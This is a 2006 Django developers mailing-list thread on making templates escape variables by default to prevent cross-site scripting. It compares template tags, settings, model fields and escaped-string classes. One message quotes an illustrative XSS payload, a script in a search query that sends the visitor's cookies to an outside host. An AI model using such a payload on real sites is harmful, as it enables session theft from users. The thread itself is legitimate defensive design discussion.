Proposal: default escaping

108 views
Skip to first unread message

SmileyChris

unread,
Jun 13, 2006, 6:49:15 PM6/13/06
to Django developers
Here's how I see it:
- 99% of the time, templates are HTML
- most template variables should be escaped
- developers are human and will miss variables that need escaping

My proposal is that all templates variables are escaped by default.


Think about it for a bit before you throw the idea away. Then reply
with your thoughts.


Of course we need an easy method to NOT auto-escape variables. Perhaps
something like {{{{ raw_variable }}}}?

There is also the issue of MASSIVE backwards incompatibility. The two
options I see ane:
1. A new variable type is created for auto-escaping instead
2. Provide a setting which turns this new functionality on but is off
by default

Rudolph

unread,
Jun 13, 2006, 7:07:27 PM6/13/06
to Django developers
Hi,

Pro:
- secure by default: you do not miss one variable because you have to
explicitly disable it for a variable, I would prefer a little more
verbose syntax like: {{ variable|noescape }}.

Con:
- explicit escaping is better then implicit escaping (no magic behind
the scenes)

I like your idea of explicitly turning it on or off globally in the
settings. In addition to that idea I would suggest an option to set the
behaviour for a whole Template, something like:

tmpl = loader.get_template('example.csv')
tmpl.auto_escape = False
tmpl.render(context)

You could also skip the idea of globally enabled escaping, and only do
it per template as described above. I'm not sure what I like the most.

Rudolph

Michael Radziej

unread,
Jun 14, 2006, 3:00:46 AM6/14/06
to django-d...@googlegroups.com
Hi,

Some time ago, I wrote something in this direction, it's a Template
subclass that escapes all variable nodes. I found that I don't use
it, but perhaps someone wants to build upon it. It works, but misses
a proper loader.

If you have a pre-formatted string, you have to turn it into an
HtmlEscapedString when putting it into the Context.

It's attached.

Michael

htmltemplate.py

Simon Willison

unread,
Jun 14, 2006, 4:57:46 AM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 00:07, Rudolph wrote:

> I like your idea of explicitly turning it on or off globally in the
> settings. In addition to that idea I would suggest an option to set
> the
> behaviour for a whole Template, something like:
>
> tmpl = loader.get_template('example.csv')
> tmpl.auto_escape = False
> tmpl.render(context)

I'm not keen on either of those options. The template file itself is
the place where the assumption of escaping v.s. not-escaping matters.
Example: I write a template that expects auto escaping to be on:

<p>Hello, {{ name_from_form }}</p>

My assumption that escaping is turned on is built in to the template
file itself. If I hand it off to a friend and they deploy it
somewhere without realising that their settings file should have
AUTO_ESCAPE=True, they have an XSS hole. Alternatively, if they load
my template and set tmpl.auto_escape=False they have a hole as well.

Further more, setting auto escaping globally destroys all chances of
code reusability. What if I download a forum application from
somewhere and a poll application from somewhere else, and one of them
expects the global AUTO_ESCAPE option to be true while the other
expects it to be false? This is /exactly/ what happened with the
whole magic quotes thing in PHP and it made writing reusable PHP
components virtually impossible.

In my opinion, there are three viable solutions:

1. auto_escape is on for ALL Django templates ALL the time. It may
well be too late to do this due to backwards compatibility concerns.

2. auto_escape is controlled in the Django template file itself. The
above example might become something like this:

{% auto_escape_on %} <!-- global setting for this template -->
<p>Hello, {{ name_from_form }}</p>

Or maybe a block-style template tag:

{% autoescape %}
<p>Hello, {{ name_from_form }}</p>
{% endautoescape %}

While the second seems to fit better with previous template tags, I
actually prefer the first. It reminds me of Python's method for
stating that a .py source code is written in UTF-8:

# -*- coding: utf-8 -*-

3. Auto escape based on the file extension for the template -
"frontpage.html" gets auto escaped, "welcome_email.txt" doesn't. I'm
not sure how I feel about this option.

The ideal situation would be for auto_escape to be on by default, and
let templates turn it off if they need to. This has serious backwards
compatibility issues however.

Naturually, an "unescape" filter should be included so that even when
auto escaping is on you can still undo it on a per-variable basis if
you need to.

Cheers,

Simon

Gábor Farkas

unread,
Jun 14, 2006, 5:48:32 AM6/14/06
to django-d...@googlegroups.com
Simon Willison wrote:
>
>
> The ideal situation would be for auto_escape to be on by default, and
> let templates turn it off if they need to. This has serious backwards
> compatibility issues however.

the official opinion is that there's no backward-compatibility
guarantees before 1.0 anyway...

i understand that it would be nice not to break backward compatibility,
but escaping is imho such a serious issue, that imho it would make
sense, even if it causes backward-incompatibility.

and, if we'll have a template tag, like "{% auto_escape_off %}", then if
you do not want to break your older templates, simply add this line to
all of them, and everything will be like before. clean and simple.

gabor

Deryck Hodge

unread,
Jun 14, 2006, 8:26:33 AM6/14/06
to django-d...@googlegroups.com
Hi, all. <imitates_radio>First time caller here.</imitates_radio>

On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
> In my opinion, there are three viable solutions:
>
> 1. auto_escape is on for ALL Django templates ALL the time. It may
> well be too late to do this due to backwards compatibility concerns.
>

Another concern about this option, rather than just backwards compatibility,
is that Django would be making assumptions about what I want to do with
my data. I don't agree with the assumption in the parent that "most template
variables should be escaped". Probably they should, but that's a debatable
point, not a fact.

One of the things I love about Django most, is that it doesn't make
assumptions about what I want to do, at least not assumptions of this kind.
It just gives me tools for doing what I want more efficiently.

> 2. auto_escape is controlled in the Django template file itself. The
> above example might become something like this:

I think this is better. Then it's still my choice, but I'm capable of
applying escaping more quickly and easily. It's about efficiency again. :-)

Cheers,
deryck

--
Deryck Hodge
http://www.devurandom.org/
http://www.samba.org/

"Aimless days, uncool ways of decathecting" --Mike Doughty (2005)

Derek Anderson

unread,
Jun 14, 2006, 9:44:47 AM6/14/06
to django-d...@googlegroups.com
the problem is that there are multiple types of escaping. sql? html?
javascript? new-web-tech-of-the-day? do you escape them all, or just some?

personally, i don't like my framework to auto-munge my data behind my
back. esp. in ways that are not clearly defined and could change on a
whim. too many potential secondary effects. plus it stinks to me of a
false sense of security while implicitly OKing people to ignore security.

but if it is going to be done, i'd suggest a flag on the field in the
model. ("automunge-html":="true"?) with perhaps a model default.

Simon Willison

unread,
Jun 14, 2006, 10:20:29 AM6/14/06
to django-d...@googlegroups.com
On 14 Jun 2006, at 14:44, Derek Anderson wrote:

> the problem is that there are multiple types of escaping. sql? html?
> javascript? new-web-tech-of-the-day? do you escape them all, or
> just some?
>
> personally, i don't like my framework to auto-munge my data behind my
> back. esp. in ways that are not clearly defined and could change on a
> whim. too many potential secondary effects. plus it stinks to me
> of a
> false sense of security while implicitly OKing people to ignore
> security.
>
> but if it is going to be done, i'd suggest a flag on the field in the
> model. ("automunge-html":="true"?) with perhaps a model default.

The model is definitely the wrong place for this - after all, a model
field might be output in a plain text email where escaping isn't
appropriate.

The problem here is very simple: XSS is the most common vulnerability
on the Web. It's unbelievably easy for an XSS vulnerability to sneak
in to an application - even experienced programmers who completely
understand the security implications are likely to forget to add a |
escape filter once in a while.

Obviously we DO need to be able to turn auto escaping off - there are
plenty of cases where it isn't appropriate. A classic example from
Django at the moment would be:

{% value|markdown %}

We should also be able to turn it off for people who don't like it,
like yourself!

BUT... we can't have it as a global setting. magic quotes in PHP has
taught us that much - global settings relating to auto filtering of
data lead to insanity when you start wanting to create reusable
applications.

That's why I'm keen on having escaping set at the template level. I'm
actually starting to feel that using the template extension might not
be a bad idea here. "index.html" has auto escaping, "index.txt"
doesn't. That way templates don't have to include an ugly extra tag
at the top of the code.

Cheers,

Simon

Derek Anderson

unread,
Jun 14, 2006, 10:48:16 AM6/14/06
to django-d...@googlegroups.com
the idea of it being in the model was more along the lines of validating
incoming data than it was munging outgoing. html is almost always
either acceptable or it's not in a given field. (per your example: who
want's arbitrary HTML allowed in a plain text email and not in a web
page?)

but i still argue that no implicit magic munging happen anywhere. it's
not that hard to get into safe-from-XSS coding styles. we did it for
sql injection, didn't we? :)

however, i would much rather have a flag/tag at the top of my template
than a global default based on template file type.

Deryck Hodge

unread,
Jun 14, 2006, 11:00:45 AM6/14/06
to django-d...@googlegroups.com
On 6/14/06, Derek Anderson <pub...@kered.org> wrote:
>
> the idea of it being in the model was more along the lines of validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example: who
> want's arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere. it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)
>

I'm agreed with Simon that if this should happen it shouldn't be at the
model level, but I'm really in agreement with Derek on the larger issue
here that this shouldn't be turned on by default. It smells to me of
a false sense of security.

And really, if it's done at the template level, you'll still have to decide
when to turn on/off, so why change the default? I just like the idea of
adding a {% autoescape %} or something similar much better.

Just my .02...

Simon Willison

unread,
Jun 14, 2006, 11:13:16 AM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 15:48, Derek Anderson wrote:

> the idea of it being in the model was more along the lines of
> validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example:
> who
> want's arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging happen anywhere.
> it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)

It's not just about data from models though. The absolutely classic
XSS example is the search feature that redisplays the query:

blah.com/search?q=django

You searched for {{ q }}:

{% for result in searchresults %}
...
{% endfor %}

blah.com/search?q=<script>window.location='http://hax.ru/?
steal='+document.cookie</script>

XSS hole!

What do you think of auto escaping being on for .html templates and
off for .txt templates?

Cheers,

Simon

Michael Radziej

unread,
Jun 14, 2006, 11:19:56 AM6/14/06
to django-d...@googlegroups.com
Hmm. I see two different cases that get munched in the discussion:

a) You run data through some filter or inside a html tag where it shouldn't be escaped.
For this, you (or the designer) need to specify this in the template.

b) Parts of the context are pre-assembled html or are already unescaped. The designer can't
always know when this is the case.
To cope with this, I really like the approach of Ian Bicking's Quixote:
Everything that has already been escaped is packaged in a wrapper class,
so that you pass something like
HtmlEscaped('<a href="..">bla</a>')
into the context.

Michael

oggie rob

unread,
Jun 14, 2006, 12:19:20 PM6/14/06
to Django developers
> What do you think of auto escaping being on for .html templates and off for .txt templates?

Simon,
Sounds clean but consider:
a) The ever-present argument about file extensions & template syntax
(that we seemed to solve with MR)
b) These can't be so easily extended. For example, to switch your
entire app from non-escaping to escaping you have to rename all your
files. If you set a variable in a base template, you can just add the
tag there.
So I think {% auto_escape_on %} or {% auto_escape_off %} are better
options (depending on consensus to which should be the default).

-rob

Simon Willison

unread,
Jun 14, 2006, 12:51:28 PM6/14/06
to django-d...@googlegroups.com

On 14 Jun 2006, at 17:19, oggie rob wrote:

> a) The ever-present argument about file extensions & template syntax
> (that we seemed to solve with MR)
> b) These can't be so easily extended. For example, to switch your
> entire app from non-escaping to escaping you have to rename all your
> files. If you set a variable in a base template, you can just add the
> tag there.
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

You've got me convinced. In that case, my preference is probably for
auto escape to be on by default, and for it to be turn on-and-offable
with {% autoescape on %} and {% autoescape off %}.

Deryck Hodge

unread,
Jun 14, 2006, 1:02:51 PM6/14/06
to django-d...@googlegroups.com
On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
>

My preference would be off by default with the same on-and-offable
tags listed here. I'd rather make the conscious choice to escape rather
than unescape. And your still backwards compatible at that point.

But I can live with on by default, too. :-)

Rudolph

unread,
Jun 14, 2006, 1:48:54 PM6/14/06
to Django developers
Hi,

Derek Anderson mentioned the need for different kinds of escaping. So
maybe the syntax should be more something like:

{% autoescape xml on %}

and

{% autoescape javascript on %}

Rudolph

Jacob Kaplan-Moss

unread,
Jun 14, 2006, 3:08:11 PM6/14/06
to django-d...@googlegroups.com
Hi folks --

So the benefits of automatic escaping are pretty obvious --
protection from XSS attacks -- but I'm wary of a few details in the
existing proposals.

First, escaping everything by default complete breaks every existing
template. That's not necessarily a complete deal-breaker, but I'm
pretty much -1 on the idea as it seems too radical.

I like the proposal by Simon (et al) for an {% autoescape on %} tag.
However, there are some semantics of the tag that are scary. Not
doing it as a block tag means that simply by calling the tag I've
switched the template language into a different system. That has non-
obvious implications when used with extension/inclusion. For example::

base.html:

{% autoescape on %}
{% block content %}{% endblock %}

child.html:

{% extends "base.html" %}
{% block content %}{{ var }}{% endblock %}

How does {{ var }} behave in the child template?

And for content brought in through {% include %}?

Sure, answers to these questions can be documented, but I still think
they'd be non-obvious. Because of that, I'm -0 on this concept
without further exploration.

Given that, I think the best idea is still using a block tag::

{% escape %}
{{ var }}
{% endescape %}

that just seems the most clear to me.

Jacob

gabor

unread,
Jun 14, 2006, 4:04:29 PM6/14/06
to django-d...@googlegroups.com
Jacob Kaplan-Moss wrote:
> Hi folks --
>
> So the benefits of automatic escaping are pretty obvious --
> protection from XSS attacks -- but I'm wary of a few details in the
> existing proposals.
>
> <snip/>

i completely agree that before doing such a global change, all
consequences will have to be examined/specified.


>
> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}
>
> that just seems the most clear to me.

maybe we could try to answer a question:

is it true, that people usually forget to escape dangerous variables?


a) if no (people do not forget):
means people are already using 'escape' when needed. in this case, this
block-level tag is a welcome addition, because it makes it
simpler/more-convenient to toggle escaping.


b) if yes (people do forget):
a block level tag will not help. people will forget to use them the same
way they forget to use the 'escape' filter.

my guess is (b)

gabor

SmileyChris

unread,
Jun 15, 2006, 12:19:33 AM6/15/06
to Django developers
gabor wrote:
> my guess is (b)

I think (b) is pretty much a given. Looking back in the developers
group history, I see this is a recurring problem that seems to keep
getting put in the "too hard" basket.

See:
http://groups.google.com/group/django-users/browse_thread/thread/21da889ecb9c63dd/145e3e9c0e39b310
which references:
http://groups.google.com/group/django-users/browse_thread/thread/13cf8218d3a18aad/f4648b081c90885a
http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/2ee9766d0d148706

Gary Wilson

unread,
Jun 15, 2006, 1:55:44 PM6/15/06
to Django developers
gabor wrote:
> is it true, that people usually forget to escape dangerous variables?
>
>
> a) if no (people do not forget):
> means people are already using 'escape' when needed. in this case, this
> block-level tag is a welcome addition, because it makes it
> simpler/more-convenient to toggle escaping.
>
>
> b) if yes (people do forget):
> a block level tag will not help. people will forget to use them the same
> way they forget to use the 'escape' filter.
>
> my guess is (b)

or

c) people don't know what XSS is and are clueless about the need to
escape. A good case for turning escaping on by default.


What would you rather have:
"Help, help! How do I turn off escaping?"
or
"Help, help! H4a0r s+0l3|> my Dj4|\|g0!!!!!!!!111"

James Bennett

unread,
Jun 15, 2006, 2:15:41 PM6/15/06
to django-d...@googlegroups.com
On 6/15/06, Gary Wilson <gary....@gmail.com> wrote:
> What would you rather have:
> "Help, help! How do I turn off escaping?"

I don't know... memories are stirring of my PHP days and the horror of
magic_quotes...


--
"May the forces of evil become confused on the way to your house."
-- George Carlin

Norman Harman

unread,
Jun 15, 2006, 2:37:33 PM6/15/06
to django-d...@googlegroups.com
For my ImageUploadFields I ignore the filename provided by user and
and name it something specific. I got real tired of the save_file
method appending underscores when it found a file with that name
already existed.

So, added this delete_fieldname_file(). Works like save_filename_file
but deletes any file named get_fieldname_file.

Maybe somemone else likes it. It should be added to mr.

patch attached, I hope...

delme

Rowan Kerr

unread,
Jun 15, 2006, 6:44:04 PM6/15/06
to django-d...@googlegroups.com
On 6/15/06, James Bennett <ubern...@gmail.com> wrote:
> I don't know... memories are stirring of my PHP days and the horror of
> magic_quotes...

As long as the data is only escaped on final output (and here escaping
should actually be intelligent as to whether it's outputting html, or
some mime-encoded email). magic_quotes mangled all your data no matter
where it was from or where it was going.

-Rowan

Phil Powell

unread,
Jun 16, 2006, 9:17:14 AM6/16/06
to django-d...@googlegroups.com
On 14/06/06, oggie rob <oz.rob...@gmail.com> wrote:
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

I'm kind of +1 for leaving it off by default - I'm not keen on data
getting munged behind my back.

And as for the argument that people will forget to use it - I have the
hard-line opinion of: tough, you should be more careful. If it
forcibly makes developers more aware of the possibilities of XSS et
al, then that can only be a good thing.

Just to throw something else into the mix: how about a HTMLField?

-Phil

Christopher Lenz

unread,
Jun 16, 2006, 12:17:35 PM6/16/06
to django-d...@googlegroups.com
Am 14.06.2006 um 21:08 schrieb Jacob Kaplan-Moss:
[snip]

> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}

I feel this is inelegant and insufficient. Back when this topic was
raised last time, I chimed in with a reference to how we handling
HTML escaping in Trac:

http://groups.google.com/group/django-developers/browse_thread/
thread/e448bbdd40426915/9962020f9699471c?q=lenz&rnum=8#9962020f9699471c

To reiterate: templates shouldn't need to care about escaping. Django
*in particular* uses an intentionally dumbed down template system
that is supposed to be easy for non-programmers, which includes the
notion that little mistakes in templates shouldn't break the site or
even introduce security holes.

IMHO, a real solution for this problem is that any normal string
inserted into template output is escaped by default. This does not
necessarily mean that there needs to be an unescape filter, though.
In fact, most of the time Django components that generate a string
they *know* that they are generating text that must not be escaped,
such as the output of the markdown filter, or form field render()
results. Those places should flag the strings they are generating in
some way (for example by wrapping them in a special class), thereby
signaling to the template system that those strings should not be
escaped again.

Now, I'll admit that the Django template engine being output-type
agnostic is a problem in this context. But then again, I'm not happy
with Django templating in general, so I'll just shut up now :-P

Cheers,
Chris
--
Christopher Lenz
cmlenz at gmx.de
http://www.cmlenz.net/

SmileyChris

unread,
Jun 18, 2006, 12:54:22 AM6/18/06
to Django developers
Brilliant, Christopher. This is exactly the solution I'd be pleased
with!

We still have the problem of invalidating every single template written
so far in Django, however...

James Bennett

unread,
Jun 18, 2006, 2:54:25 AM6/18/06
to django-d...@googlegroups.com
On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> To reiterate: templates shouldn't need to care about escaping. Django
> *in particular* uses an intentionally dumbed down template system
> that is supposed to be easy for non-programmers, which includes the
> notion that little mistakes in templates shouldn't break the site or
> even introduce security holes.

The problem here, architecture-wise, is that the template is the thing
that cares about what output looks like. Moving the decision of
whether to escape or not into some other part of the stack breaks with
that and introduces the possibility of frustrating inconsistency in
the templating system; explaining to a template author why {{ foo }}
escapes in one case but not another, based on (to the template author)
black magic happening in the backend isn't something I particularly
want to do.


> IMHO, a real solution for this problem is that any normal string
> inserted into template output is escaped by default. This does not
> necessarily mean that there needs to be an unescape filter, though.

Yes. Yes, it does.

> In fact, most of the time Django components that generate a string
> they *know* that they are generating text that must not be escaped,
> such as the output of the markdown filter, or form field render()
> results. Those places should flag the strings they are generating in
> some way (for example by wrapping them in a special class), thereby
> signaling to the template system that those strings should not be
> escaped again.

As someone who's followed various RSS-related discussions for a long
time, I can say that having multiple layers of a system have to worry
about whether the other layers have escaped or unescaped something is
a very special kind of hell that I don't want Django to get mired in.

But beyond that, it feels like a violation of loose coupling; doing
this would bind Django components to each other in ways that don't
feel right.

My vote is for escaping being off unless explicitly turned on, and for
it being turned on in the template.

pub...@kered.org

unread,
Jun 19, 2006, 3:18:13 PM6/19/06
to django-d...@googlegroups.com
To better detail the "in the model" idea:

An additional field type would be added, extending CharField, called say
"HTMLSafeField". It would strip/escape/convert/reject invalid strings
both when being set and when being read. Otherwise it would behave just
like a CharField.

The key is not to think of it as an escaping mechanism; simply as a data
validity check. And there is ample precedence for this in Django. What
are EmailFields, PhoneNumberFields and SlugFields if not simply CharFields
that match a regex?

"Intro" users who are not able to grok XSS can simply be told to always
use HTMLSafeFields instead of CharFields. Converting existing apps would
be simple model-only search-and-replace exercises. Folks who don't like
wrapper tags around all variables in templates will be appeased. (as will
those who don't want "escape=on" tags at the top of every template) And I
(and my like-minded kin) who think both "breaking every template==bad" and
"magic behind the scenes==worse" will not vomit at the addition.

Likewise XMLSafeField, JavascriptSafeField, MustMatchUserRegexField, etc.
would be logical extensions.

The biggest downside is if you want valid HTML data stored for one output
type and escaped for another. But this is not a scenario I've ever seen
in the real world, and regardless is easily worked around with simply
returning to CharFields for that one attribute. (and manually escaping of
course)

What do you think?

-- Derek

Simon Willison

unread,
Jun 19, 2006, 3:37:28 PM6/19/06
to django-d...@googlegroups.com

On 19 Jun 2006, at 20:18, pub...@kered.org wrote:

> The biggest downside is if you want valid HTML data stored for one
> output
> type and escaped for another. But this is not a scenario I've ever
> seen
> in the real world, and regardless is easily worked around with simply
> returning to CharFields for that one attribute. (and manually
> escaping of
> course)
>
> What do you think?

I'm not keen on escaping being controlled by the model - escaping
should be a template-level decision as that's when you decide what
format is being output (plain text email / HTML / XML / LaTeX for PDF
conversion etc).

I played around with some proof of concepts over the weekend and I
think I have some ideas that should keep most people happy. I'll try
to write them up on the wiki this evening.

Cheers,

Simon

pub...@kered.org

unread,
Jun 19, 2006, 4:00:57 PM6/19/06
to django-d...@googlegroups.com
> I'm not keen on escaping being controlled by the model - escaping
> should be a template-level decision as that's when you decide what
> format is being output (plain text email / HTML / XML / LaTeX for PDF
> conversion etc).
>
> I played around with some proof of concepts over the weekend and I
> think I have some ideas that should keep most people happy. I'll try
> to write them up on the wiki this evening.

that's why i suggest looking at this as a data validation issue. (not
simply as escaping) we do lots of validation in the model already. (some
argue that *all* data validation should be in the model) this would just
be an additional type.

anyway, i suppose i will wait for you to elaborate on your reasoning in
the wiki this evening. :)

SmileyChris

unread,
Jun 19, 2006, 11:42:39 PM6/19/06
to Django developers
pub...@kered.org wrote:

> that's why i suggest looking at this as a data validation issue. (not
> simply as escaping) we do lots of validation in the model already.

But it is an escaping issue.
There's nothing wrong with allowing html to be entered in (for example)
a comment field. It should be escaped in most templates, but sometimes
not, for example if there was a plain-text email of comments that gets
sent.

Simon Willison

unread,
Jun 20, 2006, 2:50:41 AM6/20/06
to django-d...@googlegroups.com

On 19 Jun 2006, at 21:00, pub...@kered.org wrote:

> anyway, i suppose i will wait for you to elaborate on your
> reasoning in
> the wiki this evening. :)

I've written up a proposal for how we can implement auto escaping
while hopefully keeping most people happy:

http://code.djangoproject.com/wiki/AutoEscaping

It incorporates stuff from a whole bunch of prior discussions. In my
opinion the most important aspect is the use of special escapedstr
and escapedunicode subclasses to mark a string as having been already
escaped, meaning that the auto escaping mechanism knows if it should
kick in to action or not. This should also avoid double escaping, and
allow a decent level of finely grained control over the escaping
mechanism.

I'd like to get a branch going to explore this stuff properly. From
messing around with my own local code it seems like it should all
work, but there's a bunch of work that needs to be done to make
existing Django filters and templates auto escape compliant.

Cheers,

Simon

Michael Radziej

unread,
Jun 20, 2006, 4:34:45 AM6/20/06
to django-d...@googlegroups.com
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

GoodStuff! (tm)

Michael

adurdin

unread,
Jun 20, 2006, 5:50:07 AM6/20/06
to Django developers
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

A very nice solution, with a good method of automatically flagging
things as escaped or not; but it seems to me more complicated than is
needed. And, of course there's more than just html escaping needed;
URLs should be escaped differently, and other values intended to be
used as attributes also need a different escape filter -- I'm not sure
your proposal will allow these to be handled correctly and
conveniently. So here's another idea to throw into the soup:

Having the context aware of the primary escaping needs of the output is
a nice idea, but as James Bennett pointed out, the template is what
should be making the decision. Suppose the template render had a
"default filter" that would get applied to all otherwise unfiltered
output? Obviously, the default value for this would be
django.template.defaultfilters.escape -- but it could be set to
another filter for JSON output, or to None for plain text. One
possible mechanism for doing this would be a {% default_filter ... %}
tag in the template...?

Assuming the default, then {{name}} would be the equivalent of
{{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
unchanged, and a new filter "raw" (just a pass-thru) could be used for
situations like <script>{{myscript|raw}}</script>.

The main drawback I see with this is that the behaviour of
{{mylist|count}} is not obviously unescaped. Perhaps having all output
piped through the default filter unless it is piped through the "raw"
filter (which could perhaps be handled using Michael's escaped
strings)?

Andrew

adurdin

unread,
Jun 20, 2006, 6:05:00 AM6/20/06
to Django developers
adurdin wrote:
>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped.

I meant {{mylist|length}}, of course.

Todd O'Bryan

unread,
Jun 20, 2006, 7:02:33 AM6/20/06
to django-d...@googlegroups.com
Couldn't we do something less invasive/complicated?

How about

{{ var }}

by default escapes the contents (in other words, the very first
filter called on a variable is escape, by default) and

{{ var|raw }}

skips the call to escape?

It breaks backwards compatibility, but maybe there's a way to avoid
that with a setting of some sort. (Say AUTO_ESCAPE=false in
settings.py for people who don't want the change.)

Todd

Todd O'Bryan

unread,
Jun 20, 2006, 7:05:50 AM6/20/06
to django-d...@googlegroups.com
Hey. We came up with this independently. It must be a good idea. :-)

Todd

Michael Radziej

unread,
Jun 20, 2006, 7:15:01 AM6/20/06
to django-d...@googlegroups.com
Hi,

I thought a little bit about your remarks and I think all your problems can be solved.

Perhaps it's also a good idea to add an attribute `raw` to the class `escaped`, so that
you can always access the raw string when it is necessary. In some circumstances, such
as when you pass a complete html table in the context, this could simply raise an error.

adurdin wrote:
> Simon Willison wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> A very nice solution, with a good method of automatically flagging
> things as escaped or not; but it seems to me more complicated than is
> needed. And, of course there's more than just html escaping needed;
> URLs should be escaped differently, and other values intended to be
> used as attributes also need a different escape filter -- I'm not sure
> your proposal will allow these to be handled correctly and
> conveniently.

Well then ... one thing after the other, and first things first ;-)

You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.
Or, there could be a separate class, similar to `escaped` from Simon's proposal, that would mark
url-encoded strings. If necessary. I find myself creating links almost completely with template tags, and they
would care about the actual encoding.

So here's another idea to throw into the soup:
>
> Having the context aware of the primary escaping needs of the output is
> a nice idea, but as James Bennett pointed out, the template is what
> should be making the decision.

I still don't see why. The programmer who has assembled the string should know best
whether it is already escaped or not, (and usually it isn't). The template might know when
to escape an unescaped string, but it can't know if this is a piece of html that should
be left as is.

Note that the escaping does not happen in the context, but during rendering, so that template filters
and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

> Suppose the template render had a
> "default filter" that would get applied to all otherwise unfiltered
> output? Obviously, the default value for this would be
> django.template.defaultfilters.escape -- but it could be set to
> another filter for JSON output, or to None for plain text. One
> possible mechanism for doing this would be a {% default_filter ... %}
> tag in the template...?

That's fine with the proposal. Just have the "default filter" check whether this is already escaped
or not.

> Assuming the default, then {{name}} would be the equivalent of
> {{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
> unchanged, and a new filter "raw" (just a pass-thru) could be used for
> situations like <script>{{myscript|raw}}</script>.

Or: {% autoescape off %}<script>{{myscript}}</script>{% endautoescape %}
Or: write a simple template tag {% script %} if you need this a lot.

>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped. Perhaps having all output
> piped through the default filter unless it is piped through the "raw"
> filter (which could perhaps be handled using Michael's escaped
> strings)?

Michael

Simon Willison

unread,
Jun 20, 2006, 7:48:32 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 12:02, Todd O'Bryan wrote:
> Couldn't we do something less invasive/complicated?
>
> How about
>
> {{ var }}
>
> by default escapes the contents (in other words, the very first
> filter called on a variable is escape, by default) and
>
> {{ var|raw }}
>
> skips the call to escape?

This doesn't interact well with many filters - things like urlize or
markdown or any of the filters that expect non-escaped content. They
either have to unescape stuff that is fed to them (nasty) or you need
to manually chain a 'raw' filter in before them (also nasty).

> It breaks backwards compatibility, but maybe there's a way to avoid
> that with a setting of some sort. (Say AUTO_ESCAPE=false in
> settings.py for people who don't want the change.)

As discussed previously, I'm dead against a global setting because
they completely kill application portability. PHP's magic quotes
global setting is a great example of this - for a long time there
were apps that expected it to be on and others that expected it to be
off and as a result you couldn't mix and match code.

There are some links to previous discussions on this stuff at the
bottom of http://code.djangoproject.com/wiki/AutoEscaping .

Cheers,

Simon

Simon Willison

unread,
Jun 20, 2006, 7:49:23 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 12:15, Michael Radziej wrote:

> Perhaps it's also a good idea to add an attribute `raw` to the
> class `escaped`, so that
> you can always access the raw string when it is necessary. In some
> circumstances, such
> as when you pass a complete html table in the context, this could
> simply raise an error.

I'm not sure that this would be a problem. That's why I want to get a
branch up and running - a lot of the problems with this stuff are
hard to predict until you're running actual code.

Cheers,

Simon

adurdin

unread,
Jun 20, 2006, 8:48:34 AM6/20/06
to Django developers
Michael Radziej wrote:

>
> adurdin wrote:
>
> You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.

True.

> > Having the context aware of the primary escaping needs of the output is
> > a nice idea, but as James Bennett pointed out, the template is what
> > should be making the decision.
>
> I still don't see why. The programmer who has assembled the string should know best
> whether it is already escaped or not, (and usually it isn't). The template might know when
> to escape an unescaped string, but it can't know if this is a piece of html that should
> be left as is.

Not at all -- the template author will know based on the source of the
string, and can make an appropriate decision as to whether it should be
passed through raw or not. Although having though more about this, I
can't see that it offers any benefit over your intelligent
auto-escaping apart from being explicit in the template. The real
benefit of that is probably a matter of opinion.


Regardless, there's another situation that will most likely arise that
needs to be discussed in your proposal: A string of escaped text is to
be rendered with *further* escaping. What should happen for {{
escaped_str|escape }}? One use case for this is a page with both a
preview and an edit field for HTML content:

{{ page_html }}
<textarea>{{ page_html|escape }}</textarea>

Nothing difficult to solve here, just aiming for completeness.


> Note that the escaping does not happen in the context, but during rendering, so that template filters
> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

One thing that bothered me about the proposal was having the
auto-escape property set in the context; which I believe is the wrong
place; it should be set in the Template instance (or subclass). A
context should be reusable between different templates (e.g. an html
page, a JSON object, an XML page).

Andrew

Michael Radziej

unread,
Jun 20, 2006, 9:26:08 AM6/20/06
to django-d...@googlegroups.com
Hey Andrew!

adurdin wrote:
> Michael Radziej wrote:
>> adurdin wrote:
>>> Having the context aware of the primary escaping needs of the output is
>>> a nice idea, but as James Bennett pointed out, the template is what
>>> should be making the decision.
>> I still don't see why. The programmer who has assembled the string should know best
>> whether it is already escaped or not, (and usually it isn't). The template might know when
>> to escape an unescaped string, but it can't know if this is a piece of html that should
>> be left as is.
>
> Not at all -- the template author will know based on the source of the
> string, and can make an appropriate decision as to whether it should be
> passed through raw or not.

Now this is probably the most important point where our discussion boils down.

